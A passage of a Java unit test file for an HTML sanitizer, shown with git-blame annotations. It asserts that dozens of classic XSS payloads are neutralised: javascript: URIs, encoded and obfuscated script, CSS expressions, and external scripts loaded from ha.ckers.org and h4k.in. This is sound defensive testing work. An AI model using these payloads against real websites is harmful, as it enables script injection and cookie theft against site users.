217afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src");
2190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", "src");
220afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert");
2220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>", "alert");
2230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
224afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testImgAttacks() throws Exception {
2260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img");
2270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesContain("<img src=\"http://www.myspace.com/img.gif\"/>", "<img");
228afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<img src=javascript:alert(document.cookie)>", "<img");
230afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", "<img");
2320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>", "<img");
233afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041'>", "src");
2350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041'>", "src");
236afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "alert");
2380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "alert");
239afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String s = "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>";
2410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (sanitize(s).length() != 0) {
2420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "&amp;");
2430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
2440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    s = "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>";
2450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (sanitize(s).length() != 0) {
2460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "&amp;");
2470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
248afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    sanitize("<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>");
2500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    sanitize("<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>");
251afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript");
2530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC=\"javascript:alert('XSS')\"", "javascript");
254afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript");
2560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG LOWSRC=\"javascript:alert('XSS')\">", "javascript");
257afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript");
2590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BGSOUND SRC=\"javascript:alert('XSS');\">", "javascript");
2600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
261afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testHrefAttacks() throws Exception {
2630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href");
2640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", "href");
265afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href");
2670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">", "href");
268afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org");
2700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", "ha.ckers.org");
271afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org");
2730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", "ha.ckers.org");
274afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript");
2760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS", "javascript");
277afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript");
2790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG SRC='vbscript:msgbox(\"XSS\")'>", "vbscript");
280afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta");
2820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", "<meta");
283afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta");
2850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", "<meta");
286afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta");
2880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", "<meta");
289afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe");
2910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", "iframe");
292afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript");
2940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "javascript");
295afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background");
2970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE BACKGROUND=\"javascript:alert('XSS')\">", "background");
298afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
2990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background");
3000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">", "background");
301afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript");
3030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", "javascript");
304afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert");
3060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<DIV STYLE=\"width: expression(alert('XSS'));\">", "alert");
307afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert");
3090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", "alert");
310afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert");
3120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", "ript:alert");
313afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript");
3150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BASE HREF=\"javascript:alert('XSS');//\">", "javascript");
316afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base");
3180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<BaSe hReF=\"http://arbitrary.com/\">", "<base");
319afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object");
3210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", "<object");
322afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript");
324afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", "javascript");
326afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
3280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
329afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
3310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<EMBED SRC=\" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>", "<embed");
332afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
335afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
338afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
341afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
3430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<script");
344afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script");
3460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "script");
347afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script");
3490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<SCRIPT SRC=http://ha.ckers.org/xss.js", "<script");
350afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>", "style");
3520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&#98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&#92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&#110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&#99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115&#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92&#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>", "style");
353afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe");
3550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>", "aim.exe");
356afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript");
3580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->", "javascript");
359afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document");
3610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">", "document");
3620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
363afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
3650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Test CSS protections.
3660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
367afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testCssAttacks() throws Exception {
369afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position");
3710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"position:absolute\">", "position");
372afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position");
3740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>b { position:absolute }</style>", "position");
375afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index");
3770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<div style=\"z-index:25\">test</div>", "z-index");
378afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index");
3800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<style>z-index:25</style>", "z-index");
3810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
382afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
3840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Test a bunch of strings that have tweaked the XML parsing capabilities of
3850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * NekoHTML.
3860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
3870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testIllegalXML() throws Exception {
3880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    for (int i = 0; i < BASE64_BAD_XML_STRINGS.length; i++) {
389489a0ec7301a86af8497d24748336db09ca278damikesamuel      String testStr = new String(
390489a0ec7301a86af8497d24748336db09ca278damikesamuel          Base64.decodeBase64(BASE64_BAD_XML_STRINGS[i]),
391489a0ec7301a86af8497d24748336db09ca278damikesamuel          "UTF-8");
3924e867904c8295537803c1c8a076e130df5674b58mikesamuel      sanitize(testStr);
3934e867904c8295537803c1c8a076e130df5674b58mikesamuel      sanitize(testStr);
3940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
395afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
3960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // These fail in AntiSamy due to a bug in NekoHTML
3970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
3980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<a href=\"http://www.test.com\" rel=\"nofollow\"></a>",
3990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sanitize("<a . href=\"http://www.test.com\">"));
4000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
4010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<a href=\"http://www.test.com\" rel=\"nofollow\"></a>",
4020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sanitize("<a - href=\"http://www.test.com\">"));
403afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertTrue(sanitize("<style>") != null);
4050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
406afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testPreviousBugs() throws Exception {
408afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /*
4100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * issues 12 (and 36, which was similar). empty tags cause display
4110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * problems/"formjacking"
4120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     */
413afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      Pattern p = Pattern.compile(".*<strong(\\s*)/>.*", Pattern.DOTALL);
4160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s1 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>");
4170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s2 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>");
418afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
420afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      p = Pattern.compile(".*<b(\\s*)/>.*");
